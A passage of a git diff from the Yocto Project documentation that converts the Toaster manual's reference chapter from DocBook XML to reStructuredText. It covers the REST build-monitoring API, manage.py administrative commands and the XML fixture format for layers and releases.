+it is still alive::
+
+ http://host:port/health
+
+Be sure to provide values for host and port. If the server is alive, you will
+get the response HTML:
+
+.. code-block:: html
+
+ <!DOCTYPE html>
+ <html lang="en">
+ <head><title>Toaster Health</title></head>
+ <body>Ok</body>
+ </html>
+
+Determining Status of Builds in Progress
+----------------------------------------
+
+Sometimes it is useful to determine the status of a build in progress.
+To get the status of pending builds, use the following call::
+
+ http://host:port/toastergui/api/building
+
+Be sure to provide values for host and port. The output is a JSON file that
+itemizes all builds in progress. This file includes the time in seconds since
+each respective build started as well as the progress of the cloning, parsing,
+and task execution. The following is sample output for a build in progress:
+
+.. code-block:: JSON
+
+ {"count": 1,
+ "building": [
+ {"machine": "beaglebone",
+ "seconds": "463.869",
+ "task": "927:2384",
+ "distro": "poky",
+ "clone": "1:1",
+ "id": 2,
+ "start": "2017-09-22T09:31:44.887Z",
+ "name": "20170922093200",
+ "parse": "818:818",
+ "project": "my_rocko",
+ "target": "core-image-minimal"
+ }]
+ }
+
+The JSON data for this query is returned in a
+single line. In the previous example the line has been artificially
+split for readability.
+
+Checking Status of Builds Completed
+-----------------------------------
+
+Once a build is completed, you get the status when you use the following
+call::
+
+ http://host:port/toastergui/api/builds
+
+Be sure to provide values for host and port. The output is a JSON file that
+itemizes all complete builds, and includes build summary information. The
+following is sample output for a completed build:
+
+.. code-block:: JSON
+
+ {"count": 1,
+ "builds": [
+ {"distro": "poky",
+ "errors": 0,
+ "machine": "beaglebone",
+ "project": "my_rocko",
+ "stop": "2017-09-22T09:26:36.017Z",
+ "target": "quilt-native",
+ "seconds": "78.193",
+ "outcome": "Succeeded",
+ "id": 1,
+ "start": "2017-09-22T09:25:17.824Z",
+ "warnings": 1,
+ "name": "20170922092618"
+ }]
+ }
+
+The JSON data for this query is returned in a single line. In the
+previous example the line has been artificially split for readability.
+
+Determining Status of a Specific Build
+--------------------------------------
+
+Sometimes it is useful to determine the status of a specific build. To
+get the status of a specific build, use the following call::
+
+ http://host:port/toastergui/api/build/ID
+
+Be sure to provide values for
+host, port, and ID. You can find the value for ID from the Builds
+Completed query. See the ":ref:`toaster-manual/toaster-manual-reference:checking status of builds completed`"
+section for more information.
+
+The output is a JSON file that itemizes the specific build and includes
+build summary information. The following is sample output for a specific
+build:
+
+.. code-block:: JSON
+
+ {"build":
+ {"distro": "poky",
+ "errors": 0,
+ "machine": "beaglebone",
+ "project": "my_rocko",
+ "stop": "2017-09-22T09:26:36.017Z",
+ "target": "quilt-native",
+ "seconds": "78.193",
+ "outcome": "Succeeded",
+ "id": 1,
+ "start": "2017-09-22T09:25:17.824Z",
+ "warnings": 1,
+ "name": "20170922092618",
+ "cooker_log": "/opt/user/poky/build-toaster-2/tmp/log/cooker/beaglebone/build_20170922_022607.991.log"
+ }
+ }
+
+The JSON data for this query is returned in a single line. In the
+previous example the line has been artificially split for readability.
+
+.. _toaster-useful-commands:
+
+Useful Commands
+===============
+
+In addition to the web user interface and the scripts that start and
+stop Toaster, command-line commands exist through the ``manage.py``
+management script. You can find general documentation on ``manage.py``
+at the
+`Django <https://docs.djangoproject.com/en/2.2/topics/settings/>`__
+site. However, several ``manage.py`` commands have been created that are
+specific to Toaster and are used to control configuration and back-end
+tasks. You can locate these commands in the
+:term:`Source Directory` (e.g. ``poky``) at
+``bitbake/lib/manage.py``. This section documents those commands.
+
+.. note::
+
+ - When using ``manage.py`` commands given a default configuration,
+ you must be sure that your working directory is set to the
+ :term:`Build Directory`. Using
+ ``manage.py`` commands from the Build Directory allows Toaster to
+ find the ``toaster.sqlite`` file, which is located in the Build
+ Directory.
+
+ - For non-default database configurations, it is possible that you
+ can use ``manage.py`` commands from a directory other than the
+ Build Directory. To do so, the ``toastermain/settings.py`` file
+ must be configured to point to the correct database backend.
+
+.. _toaster-command-buildslist:
+
+``buildslist``
+--------------
+
+The ``buildslist`` command lists all builds that Toaster has recorded.
+Access the command as follows:
+
+.. code-block:: shell
+
+ $ bitbake/lib/toaster/manage.py buildslist
+
+The command returns a list, which includes numeric
+identifications, of the builds that Toaster has recorded in the current
+database.
+
+You need to run the ``buildslist`` command first to identify existing
+builds in the database before using the
+:ref:`toaster-manual/toaster-manual-reference:\`\`builddelete\`\`` command. Here is an
+example that assumes default repository and build directory names:
+
+.. code-block:: shell
+
+ $ cd ~/poky/build
+ $ python ../bitbake/lib/toaster/manage.py buildslist
+
+If your Toaster database had only one build, the above
+:ref:`toaster-manual/toaster-manual-reference:\`\`buildslist\`\``
+command would return something like the following::
+
+ 1: qemux86 poky core-image-minimal
+
+.. _toaster-command-builddelete:
+
+``builddelete``
+---------------
+
+The ``builddelete`` command deletes data associated with a build. Access
+the command as follows:
+
+.. code-block::
+
+ $ bitbake/lib/toaster/manage.py builddelete build_id
+
+The command deletes all the build data for the specified
+build_id. This command is useful for removing old and unused data from
+the database.
+
+Prior to running the ``builddelete`` command, you need to get the ID
+associated with builds by using the
+:ref:`toaster-manual/toaster-manual-reference:\`\`buildslist\`\`` command.
+
+.. _toaster-command-perf:
+
+``perf``
+--------
+
+The ``perf`` command measures Toaster performance. Access the command as
+follows:
+
+.. code-block:: shell
+
+ $ bitbake/lib/toaster/manage.py perf
+
+The command is a sanity check that returns page loading times in order to
+identify performance problems.
+
+.. _toaster-command-checksettings:
+
+``checksettings``
+-----------------
+
+The ``checksettings`` command verifies existing Toaster settings. Access
+the command as follows:
+
+.. code-block:: shell
+
+ $ bitbake/lib/toaster/manage.py checksettings
+
+Toaster uses settings that are based on the database to configure the
+building tasks. The ``checksettings`` command verifies that the database
+settings are valid in the sense that they have the minimal information
+needed to start a build.
+
+In order for the ``checksettings`` command to work, the database must be
+correctly set up and not have existing data. To be sure the database is
+ready, you can run the following:
+
+.. code-block:: shell
+
+ $ bitbake/lib/toaster/manage.py syncdb
+ $ bitbake/lib/toaster/manage.py migrate orm
+ $ bitbake/lib/toaster/manage.py migrate bldcontrol
+
+After running these commands, you can run the ``checksettings`` command.
+
+.. _toaster-command-runbuilds:
+
+``runbuilds``
+-------------
+
+The ``runbuilds`` command launches scheduled builds. Access the command
+as follows:
+
+.. code-block:: shell
+
+ $ bitbake/lib/toaster/manage.py runbuilds
+
+The ``runbuilds`` command checks if scheduled builds exist in the database
+and then launches them per schedule. The command returns after the builds
+start but before they complete. The Toaster Logging Interface records and
+updates the database when the builds complete.
diff --git a/documentation/toaster-manual/toaster-manual-reference.xml b/documentation/toaster-manual/toaster-manual-reference.xml
deleted file mode 100644
index 7440580e7c..0000000000
--- a/documentation/toaster-manual/toaster-manual-reference.xml
+++ /dev/null
@@ -1,836 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-reference'>
-
-<title>Concepts and Reference</title>
-
- <para>
- In order to configure and use Toaster, you should understand some
- concepts and have some basic command reference material available.
- This final chapter provides conceptual information on layer sources,
- releases, and JSON configuration files.
- Also provided is a quick look at some useful
- <filename>manage.py</filename> commands that are Toaster-specific.
- Information on <filename>manage.py</filename> commands does exist
- across the Web and the information in this manual by no means
- attempts to provide a command comprehensive reference.
- </para>
-
- <section id='layer-source'>
- <title>Layer Source</title>
-
- <para>
- In general, a "layer source" is a source of information about
- existing layers.
- In particular, we are concerned with layers that you can use
- with the Yocto Project and Toaster.
- This chapter describes a particular type of layer source called
- a "layer index."
- </para>
-
- <para>
- A layer index is a web application that contains information
- about a set of custom layers.
- A good example of an existing layer index is the
- OpenEmbedded Layer Index.
- A public instance of this layer index exists at
- <ulink url='http://layers.openembedded.org'></ulink>.
- You can find the code for this layer index's web application at
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/'></ulink>.
- </para>
-
- <para>
- When you tie a layer source into Toaster, it can query the layer
- source through a
- <ulink url='http://en.wikipedia.org/wiki/Representational_state_transfer'>REST</ulink>
- API, store the information about the layers in the Toaster
- database, and then show the information to users.
- Users are then able to view that information and build layers
- from Toaster itself without worrying about cloning or editing
- the BitBake layers configuration file
- <filename>bblayers.conf</filename>.
- </para>
-
- <para>
- Tying a layer source into Toaster is convenient when you have
- many custom layers that need to be built on a regular basis by
- a community of developers.
- In fact, Toaster comes pre-configured with the OpenEmbedded
- Metadata Index.
- <note>
- You do not have to use a layer source to use Toaster.
- Tying into a layer source is optional.
- </note>
- </para>
-
- <section id='layer-source-using-with-toaster'>
- <title>Setting Up and Using a Layer Source</title>
-
- <para>
- To use your own layer source, you need to set up the layer
- source and then tie it into Toaster.
- This section describes how to tie into a layer index in a manner
- similar to the way Toaster ties into the OpenEmbedded Metadata
- Index.
- </para>
-
- <section id='understanding-your-layers'>
- <title>Understanding Your Layers</title>
-
- <para>
- The obvious first step for using a layer index is to have
- several custom layers that developers build and access using
- the Yocto Project on a regular basis.
- This set of layers needs to exist and you need to be
- familiar with where they reside.
- You will need that information when you set up the
- code for the web application that "hooks" into your set of
- layers.
- </para>
-
- <para>
- For general information on layers, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- For information on how to create layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='configuring-toaster-to-hook-into-your-layer-source'>
- <title>Configuring Toaster to Hook Into Your Layer Index</title>
-
- <para>
- If you want Toaster to use your layer index, you must host
- the web application in a server to which Toaster can
- connect.
- You also need to give Toaster the information about your
- layer index.
- In other words, you have to configure Toaster to use your
- layer index.
- This section describes two methods by which you can
- configure and use your layer index.
- </para>
-
- <para>
- In the previous section, the code for the OpenEmbedded
- Metadata Index (i.e.
- <ulink url='http://layers.openembedded.org'></ulink>) was
- referenced.
- You can use this code, which is at
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/'></ulink>,
- as a base to create your own layer index.
- </para>
-
- <section id='use-the-administration-interface'>
- <title>Use the Administration Interface</title>
-
- <para>
- Access the administration interface through a
- browser by entering the URL of your Toaster instance and
- adding "<filename>/admin</filename>" to the end of the
- URL.
- As an example, if you are running Toaster locally, use
- the following URL:
- <literallayout class='monospaced'>
- http://127.0.0.1:8000/admin
- </literallayout>
- </para>
-
- <para>
- The administration interface has a "Layer sources"
- section that includes an "Add layer source" button.
- Click that button and provide the required information.
- Make sure you select "layerindex" as the layer source type.
- </para>
- </section>
-
- <section id='use-the-fixture-feature'>
- <title>Use the Fixture Feature</title>
-
- <para>
- The Django fixture feature overrides the default layer
- server when you use it to specify a custom URL. To use
- the fixture feature, create (or edit) the file
- <filename>bitbake/lib/toaster.orm/fixtures/custom.xml</filename>,
- and then set the following Toaster setting to your
- custom URL:
- <literallayout class='monospaced'>
- &lt;?xml version="1.0" ?&gt;
- &lt;django-objects version="1.0"&gt;
- &lt;object model="orm.toastersetting" pk="100"&gt;
- &lt;field name="name" type="CharField"&gt;CUSTOM_LAYERINDEX_SERVER&lt;/field&gt;
- &lt;field name="value" type="CharField"&gt;https://layers.my_organization.org/layerindex/branch/master/layers/&lt;/field&gt;
- &lt;/object&gt;
- &lt;django-objects&gt;
- </literallayout>
- When you start Toaster for the first time, or if you
- delete the file <filename>toaster.sqlite</filename> and restart,
- the database will populate cleanly from this layer index server.
- </para>
-
- <para>
- Once the information has been updated, verify the new layer
- information is available by using the Toaster web interface.
- To do that, visit the "All compatible layers" page inside a
- Toaster project. The layers from your layer source should be
- listed there.
- </para>
-
- <para>
- If you change the information in your layer index server,
- refresh the Toaster database by running the following command:
- <literallayout class='monospaced'>
- $ bitbake/lib/toaster/manage.py lsupdates
- </literallayout>
- If Toaster can reach the API URL, you should see a message
- telling you that Toaster is updating the layer source information.
- </para>
- </section>
- </section>
- </section>
- </section>
-
- <section id='toaster-releases'>
- <title>Releases</title>
-
- <para>
- When you create a Toaster project using the web interface,
- you are asked to choose a "Release."
- In the context of Toaster, the term "Release" refers to a set of
- layers and a BitBake version the OpenEmbedded build system uses
- to build something.
- As shipped, Toaster is pre-configured with releases that
- correspond to Yocto Project release branches.
- However, you can modify, delete, and create new releases
- according to your needs.
- This section provides some background information on releases.
- </para>
-
- <section id='toaster-releases-supported'>
- <title>Pre-Configured Releases</title>
-
- <para>
- As shipped, Toaster is configured to use a specific set of
- releases.
- Of course, you can always configure Toaster to use any
- release.
- For example, you might want your project to build against a
- specific commit of any of the "out-of-the-box" releases.
- Or, you might want your project to build against different
- revisions of OpenEmbedded and BitBake.
- </para>
-
- <para>
- As shipped, Toaster is configured to work with the following
- releases:
- <itemizedlist>
- <listitem><para><emphasis>
- Yocto Project &DISTRO; "&DISTRO_NAME;" or OpenEmbedded "&DISTRO_NAME;":</emphasis>
- This release causes your Toaster projects to build
- against the head of the &DISTRO_NAME_NO_CAP; branch at
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/log/?h=rocko'></ulink>
- or <ulink url='http://git.openembedded.org/openembedded-core/commit/?h=rocko'></ulink>.
- </para></listitem>
- <listitem><para><emphasis>Yocto Project "Master" or OpenEmbedded "Master":</emphasis>
- This release causes your Toaster Projects to
- build against the head of the master branch, which is
- where active development takes place, at
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/log/'></ulink>
- or
- <ulink url='http://git.openembedded.org/openembedded-core/log/'></ulink>.
- </para></listitem>
- <listitem><para><emphasis>Local Yocto Project or Local OpenEmbedded:</emphasis>
- This release causes your Toaster Projects to
- build against the head of the <filename>poky</filename>
- or <filename>openembedded-core</filename> clone you
- have local to the machine running Toaster.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='configuring-toaster'>
- <title>Configuring Toaster</title>
-
- <para>
- In order to use Toaster, you must configure the database with the
- default content. The following subsections describe various aspects
- of Toaster configuration.
- </para>
-
- <section id='configuring-the-workflow'>
- <title>Configuring the Workflow</title>
-
- <para>
- The
- <filename>bldcontrol/management/commands/checksettings.py</filename>
- file controls workflow configuration.
- The following steps outline the process to initially populate
- this database.
- <orderedlist>
- <listitem><para>
- The default project settings are set from
- <filename>orm/fixtures/settings.xml</filename>.
- </para></listitem>
- <listitem><para>
- The default project distro and layers are added
- from <filename>orm/fixtures/poky.xml</filename> if poky
- is installed.
- If poky is not installed, they are added
- from <filename>orm/fixtures/oe-core.xml</filename>.
- </para></listitem>
- <listitem><para>
- If the <filename>orm/fixtures/custom.xml</filename> file
- exists, then its values are added.
- </para></listitem>
- <listitem><para>
- The layer index is then scanned and added to the database.
- </para></listitem>
- </orderedlist>
- Once these steps complete, Toaster is set up and ready to use.
- </para>
- </section>
-
- <section id='customizing-pre-set-data'>
- <title>Customizing Pre-Set Data</title>
-
- <para>
- The pre-set data for Toaster is easily customizable. You can
- create the <filename>orm/fixtures/custom.xml</filename> file
- to customize the values that go into to the database.
- Customization is additive,
- and can either extend or completely replace the existing values.
- </para>
-
- <para>
- You use the <filename>orm/fixtures/custom.xml</filename> file
- to change the default project settings for the machine, distro,
- file images, and layers.
- When creating a new project, you can use the file to define
- the offered alternate project release selections.
- For example, you can add one or more additional selections that
- present custom layer sets or distros, and any other local or proprietary
- content.
- </para>
-
- <para>
- Additionally, you can completely disable the content from the
- <filename>oe-core.xml</filename> and <filename>poky.xml</filename>
- files by defining the section shown below in the
- <filename>settings.xml</filename> file.
- For example, this option is particularly useful if your custom
- configuration defines fewer releases or layers than the default
- fixture files.
- </para>
-
- <para>
- The following example sets "name" to "CUSTOM_XML_ONLY" and its value
- to "True".
- <literallayout class='monospaced'>
- &lt;object model="orm.toastersetting" pk="99"&gt;
- &lt;field type="CharField" name="name"&gt;CUSTOM_XML_ONLY&lt;/field&gt;
- &lt;field type="CharField" name="value"&gt;True&lt;/field&gt;
- &lt;/object&gt;
- </literallayout>
- </para>
- </section>
-
- <section id='understanding-fixture-file-format'>
- <title>Understanding Fixture File Format</title>
-
- <para>
- The following is an overview of the file format used by the
- <filename>oe-core.xml</filename>, <filename>poky.xml</filename>,
- and <filename>custom.xml</filename> files.
- </para>
-
- <para>
- The following subsections describe each of the sections in the
- fixture files, and outline an example section of the XML code.
- you can use to help understand this information and create a local
- <filename>custom.xml</filename> file.
- </para>
-
- <section id='defining-the-default-distro-and-other-values'>
- <title>Defining the Default Distro and Other Values</title>
-
- <para>
- This section defines the default distro value for new projects.
- By default, it reserves the first Toaster Setting record "1".
- The following demonstrates how to set the project default value
- for
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>:
- <literallayout class='monospaced'>
- &lt;!-- Set the project default value for DISTRO --&gt;
- &lt;object model="orm.toastersetting" pk="1"&gt;
- &lt;field type="CharField" name="name"&gt;DEFCONF_DISTRO&lt;/field&gt;
- &lt;field type="CharField" name="value"&gt;poky&lt;/field&gt;
- &lt;/object&gt;
- </literallayout>
- You can override other default project values by adding
- additional Toaster Setting sections such as any of the
- settings coming from the <filename>settings.xml</filename>
- file.
- Also, you can add custom values that are included in the
- BitBake environment.
- The "pk" values must be unique.
- By convention, values that set default project values have a
- "DEFCONF" prefix.
- </para>
- </section>
-
- <section id='defining-bitbake-version'>
- <title>Defining BitBake Version</title>
-
- <para>
- The following defines which version of BitBake is used
- for the following release selection:
- <literallayout class='monospaced'>
- &lt;!-- Bitbake versions which correspond to the metadata release --&gt;
- &lt;object model="orm.bitbakeversion" pk="1"&gt;
- &lt;field type="CharField" name="name"&gt;rocko&lt;/field&gt;
- &lt;field type="CharField" name="giturl"&gt;git://git.yoctoproject.org/poky&lt;/field&gt;
- &lt;field type="CharField" name="branch"&gt;rocko&lt;/field&gt;
- &lt;field type="CharField" name="dirpath"&gt;bitbake&lt;/field&gt;
- &lt;/object&gt;
- </literallayout>
- </para>
- </section>
-
- <section id='defining-releases'>
- <title>Defining Release</title>
-
- <para>
- The following defines the releases when you create a new
- project.
- <literallayout class='monospaced'>
- &lt;!-- Releases available --&gt;
- &lt;object model="orm.release" pk="1"&gt;
- &lt;field type="CharField" name="name"&gt;rocko&lt;/field&gt;
- &lt;field type="CharField" name="description"&gt;Yocto Project 2.4 "Rocko"&lt;/field&gt;
- &lt;field rel="ManyToOneRel" to="orm.bitbakeversion" name="bitbake_version"&gt;1&lt;/field&gt;
- &lt;field type="CharField" name="branch_name"&gt;rocko&lt;/field&gt;
- &lt;field type="TextField" name="helptext"&gt;Toaster will run your builds using the tip of the &lt;a href="http://git.yoctoproject.org/cgit/cgit.cgi/poky/log/?h=rocko"&gt;Yocto Project Rocko branch&lt;/a&gt;.&lt;/field&gt;
- &lt;/object&gt;
- </literallayout>
- The "pk" value must match the above respective BitBake
- version record.
- </para>
- </section>
-
- <section id='defining-the-release-default-layer-names'>
- <title>Defining the Release Default Layer Names</title>
-
- <para>
- The following defines the default layers for each release:
- <literallayout class='monospaced'>
- &lt;!-- Default project layers for each release --&gt;
- &lt;object model="orm.releasedefaultlayer" pk="1"&gt;
- &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;1&lt;/field&gt;
- &lt;field type="CharField" name="layer_name"&gt;openembedded-core&lt;/field&gt;
- &lt;/object&gt;
- </literallayout>
- The 'pk' values in the example above should start at "1" and increment
- uniquely.
- You can use the same layer name in multiple releases.
- </para>
- </section>
-
- <section id='defining-layer-definitions'>
- <title>Defining Layer Definitions</title>
-
- <para>
- Layer definitions are the most complex.
- The following defines each of the layers, and then defines the exact layer
- version of the layer used for each respective release.
- You must have one <filename>orm.layer</filename>
- entry for each layer.
- Then, with each entry you need a set of
- <filename>orm.layer_version</filename> entries that connects
- the layer with each release that includes the layer.
- In general all releases include the layer.
- <literallayout class='monospaced'>
- &lt;object model="orm.layer" pk="1"&gt;
- &lt;field type="CharField" name="name"&gt;openembedded-core&lt;/field&gt;
- &lt;field type="CharField" name="layer_index_url"&gt;&lt;/field&gt;
- &lt;field type="CharField" name="vcs_url"&gt;git://git.yoctoproject.org/poky&lt;/field&gt;
- &lt;field type="CharField" name="vcs_web_url"&gt;http://git.yoctoproject.org/cgit/cgit.cgi/poky&lt;/field&gt;
- &lt;field type="CharField" name="vcs_web_tree_base_url"&gt;http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%&lt;/field&gt;
- &lt;field type="CharField" name="vcs_web_file_base_url"&gt;http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/%path%?h=%branch%&lt;/field&gt;
- &lt;/object&gt;
- &lt;object model="orm.layer_version" pk="1"&gt;
- &lt;field rel="ManyToOneRel" to="orm.layer" name="layer"&gt;1&lt;/field&gt;
- &lt;field type="IntegerField" name="layer_source"&gt;0&lt;/field&gt;
- &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;1&lt;/field&gt;
- &lt;field type="CharField" name="branch"&gt;rocko&lt;/field&gt;
- &lt;field type="CharField" name="dirpath"&gt;meta&lt;/field&gt;
- &lt;/object&gt;
- &lt;object model="orm.layer_version" pk="2"&gt;
- &lt;field rel="ManyToOneRel" to="orm.layer" name="layer"&gt;1&lt;/field&gt;
- &lt;field type="IntegerField" name="layer_source"&gt;0&lt;/field&gt;
- &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;2&lt;/field&gt;
- &lt;field type="CharField" name="branch"&gt;HEAD&lt;/field&gt;
- &lt;field type="CharField" name="commit"&gt;HEAD&lt;/field&gt;
- &lt;field type="CharField" name="dirpath"&gt;meta&lt;/field&gt;
- &lt;/object&gt;
- &lt;object model="orm.layer_version" pk="3"&gt;
- &lt;field rel="ManyToOneRel" to="orm.layer" name="layer"&gt;1&lt;/field&gt;
- &lt;field type="IntegerField" name="layer_source"&gt;0&lt;/field&gt;
- &lt;field rel="ManyToOneRel" to="orm.release" name="release"&gt;3&lt;/field&gt;
-
- &lt;field type="CharField" name="branch"&gt;master&lt;/field&gt;
- &lt;field type="CharField" name="dirpath"&gt;meta&lt;/field&gt;
- &lt;/object&gt;
- </literallayout>
- The layer "pk" values above must be unique, and typically start at "1".
- The layer version "pk" values must also be unique across all layers,
- and typically start at "1".
- </para>
- </section>
- </section>
- </section>
-
- <section id='remote-toaster-monitoring'>
- <title>Remote Toaster Monitoring</title>
-
- <para>
- Toaster has an API that allows remote management applications to
- directly query the state of the Toaster server and its builds
- in a machine-to-machine manner.
- This API uses the
- <ulink url='http://en.wikipedia.org/wiki/Representational_state_transfer'>REST</ulink>
- interface and the transfer of JSON files.
- For example, you might
- monitor a build inside a container through well supported
- known HTTP ports in order to easily access a Toaster server
- inside the container.
- In this example, when you use this direct JSON API, you avoid
- having web page parsing against the display the user sees.
- </para>
-
- <section id='checking-health'>
- <title>Checking Health</title>
-
- <para>
- Before you use remote Toaster monitoring, you should do
- a health check.
- To do this, ping the Toaster server using the following call
- to see if it is still alive:
- <literallayout class='monospaced'>
- http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/health
- </literallayout>
- Be sure to provide values for <replaceable>host</replaceable>
- and <replaceable>port</replaceable>.
- If the server is alive, you will get the response HTML:
- <literallayout class='monospaced'>
- &lt;!DOCTYPE html&gt;
- &lt;html lang="en"&gt;
- &lt;head&gt;&lt;title&gt;Toaster Health&lt;/title&gt;&lt;/head&gt;
- &lt;body&gt;Ok&lt;/body&gt;
- &lt;/html&gt;
- </literallayout>
- </para>
- </section>
-
- <section id='determining-status-of-builds-in-progress'>
- <title>Determining Status of Builds in Progress</title>
-
- <para>
- Sometimes it is useful to determine the status of a build
- in progress.
- To get the status of pending builds, use the following call:
- <literallayout class='monospaced'>
- http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/toastergui/api/building
- </literallayout>
- Be sure to provide values for <replaceable>host</replaceable>
- and <replaceable>port</replaceable>.
- The output is a JSON file that itemizes all builds in
- progress.
- This file includes the time in seconds since each
- respective build started as well as the progress of the
- cloning, parsing, and task execution.
- The following is sample output for a build in progress:
- <literallayout class='monospaced'>
- {"count": 1,
- "building": [
- {"machine": "beaglebone",
- "seconds": "463.869",
- "task": "927:2384",
- "distro": "poky",
- "clone": "1:1",
- "id": 2,
- "start": "2017-09-22T09:31:44.887Z",
- "name": "20170922093200",
- "parse": "818:818",
- "project": "my_rocko",
- "target": "core-image-minimal"
- }]
- }
- </literallayout>
- The JSON data for this query is returned in a single line.
- In the previous example the line has been artificially split for readability.
- </para>
- </section>
-
- <section id='checking-status-of-builds-completed'>
- <title>Checking Status of Builds Completed</title>
-
- <para>
- Once a build is completed, you get the status when you use
- the following call:
- <literallayout class='monospaced'>
- http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/toastergui/api/builds
- </literallayout>
- Be sure to provide values for <replaceable>host</replaceable>
- and <replaceable>port</replaceable>.
- The output is a JSON file that itemizes all complete builds,
- and includes build summary information.
- The following is sample output for a completed build:
- <literallayout class='monospaced'>
- {"count": 1,
- "builds": [
- {"distro": "poky",
- "errors": 0,
- "machine":
- "beaglebone",
- "project": "my_rocko",
- "stop": "2017-09-22T09:26:36.017Z",
- "target": "quilt-native",
- "seconds": "78.193",
- "outcome": "Succeeded",
- "id": 1,
- "start": "2017-09-22T09:25:17.824Z",
- "warnings": 1,
- "name": "20170922092618"
- }]
- }
- </literallayout>
- The JSON data for this query is returned in a single line.
- In the previous example the line has been artificially split for readability.
- </para>
- </section>
-
- <section id='determining-status-of-a-specific-build'>
- <title>Determining Status of a Specific Build</title>
-
- <para>
- Sometimes it is useful to determine the status of a specific
- build.
- To get the status of a specific build, use the following
- call:
- <literallayout class='monospaced'>
- http://<replaceable>host</replaceable>:<replaceable>port</replaceable>/toastergui/api/build/<replaceable>ID</replaceable>
- </literallayout>
- Be sure to provide values for <replaceable>host</replaceable>,
- <replaceable>port</replaceable>, and <replaceable>ID</replaceable>.
- You can find the value for <replaceable>ID</replaceable> from the
- Builds Completed query. See the
- "<link linkend='checking-status-of-builds-completed'>Checking Status of Builds Completed</link>"
- section for more information.
- </para>
-
- <para>
- The output is a JSON file that itemizes the specific build
- and includes build summary information.
- The following is sample output for a specific build:
- <literallayout class='monospaced'>
- {"build":
- {"distro": "poky",
- "errors": 0,
- "machine": "beaglebone",
- "project": "my_rocko",
- "stop": "2017-09-22T09:26:36.017Z",
- "target": "quilt-native",
- "seconds": "78.193",
- "outcome": "Succeeded",
- "id": 1,
- "start": "2017-09-22T09:25:17.824Z",
- "warnings": 1,
- "name": "20170922092618",
- "cooker_log": "/opt/user/poky/build-toaster-2/tmp/log/cooker/beaglebone/build_20170922_022607.991.log"
- }
- }
- </literallayout>
- The JSON data for this query is returned in a single line.
- In the previous example the line has been artificially split for readability.
- </para>
- </section>
- </section>
-
- <section id='toaster-useful-commands'>
- <title>Useful Commands</title>
-
- <para>
- In addition to the web user interface and the scripts that start
- and stop Toaster, command-line commands exist through the
- <filename>manage.py</filename> management script.
- You can find general documentation on
- <filename>manage.py</filename> at the
- <ulink url='https://docs.djangoproject.com/en/1.7/topics/settings/'>Django</ulink>
- site.
- However, several <filename>manage.py</filename> commands have been
- created that are specific to Toaster and are used to control
- configuration and back-end tasks.
- You can locate these commands in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky</filename>) at
- <filename>bitbake/lib/manage.py</filename>.
- This section documents those commands.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- When using <filename>manage.py</filename> commands given
- a default configuration, you must be sure that your
- working directory is set to the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- Using <filename>manage.py</filename> commands from the
- Build Directory allows Toaster to find the
- <filename>toaster.sqlite</filename> file, which is located
- in the Build Directory.
- </para></listitem>
- <listitem><para>
- For non-default database configurations, it is possible
- that you can use <filename>manage.py</filename> commands
- from a directory other than the Build Directory.
- To do so, the
- <filename>toastermain/settings.py</filename> file must be
- configured to point to the correct database backend.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <section id='toaster-command-buildslist'>
- <title><filename>buildslist</filename></title>
-
- <para>
- The <filename>buildslist</filename> command lists all builds
- that Toaster has recorded.
- Access the command as follows:
- <literallayout class='monospaced'>
- $ bitbake/lib/toaster/manage.py buildslist
- </literallayout>
- The command returns a list, which includes numeric
- identifications, of the builds that Toaster has recorded in the
- current database.
- </para>
-
- <para>
- You need to run the <filename>buildslist</filename> command
- first to identify existing builds in the database before
- using the
- <link linkend='toaster-command-builddelete'><filename>builddelete</filename></link>
- command.
- Here is an example that assumes default repository and build
- directory names:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ python ../bitbake/lib/toaster/manage.py buildslist
- </literallayout>
- If your Toaster database had only one build, the above
- <filename>buildslist</filename> command would return something
- like the following:
- <literallayout class='monospaced'>
- 1: qemux86 poky core-image-minimal
- </literallayout>
- </para>
- </section>
-
- <section id='toaster-command-builddelete'>
- <title><filename>builddelete</filename></title>
-
- <para>
- The <filename>builddelete</filename> command deletes data
- associated with a build.
- Access the command as follows:
- <literallayout class='monospaced'>
- $ bitbake/lib/toaster/manage.py builddelete <replaceable>build_id</replaceable>
- </literallayout>
- The command deletes all the build data for the specified
- <replaceable>build_id</replaceable>.
- This command is useful for removing old and unused data from
- the database.
- </para>
-
- <para>
- Prior to running the <filename>builddelete</filename>
- command, you need to get the ID associated with builds
- by using the
- <link linkend='toaster-command-buildslist'><filename>buildslist</filename></link>
- command.
- </para>
- </section>
-
- <section id='toaster-command-perf'>
- <title><filename>perf</filename></title>
-
- <para>
- The <filename>perf</filename> command measures Toaster
- performance.
- Access the command as follows:
- <literallayout class='monospaced'>
- $ bitbake/lib/toaster/manage.py perf
- </literallayout>
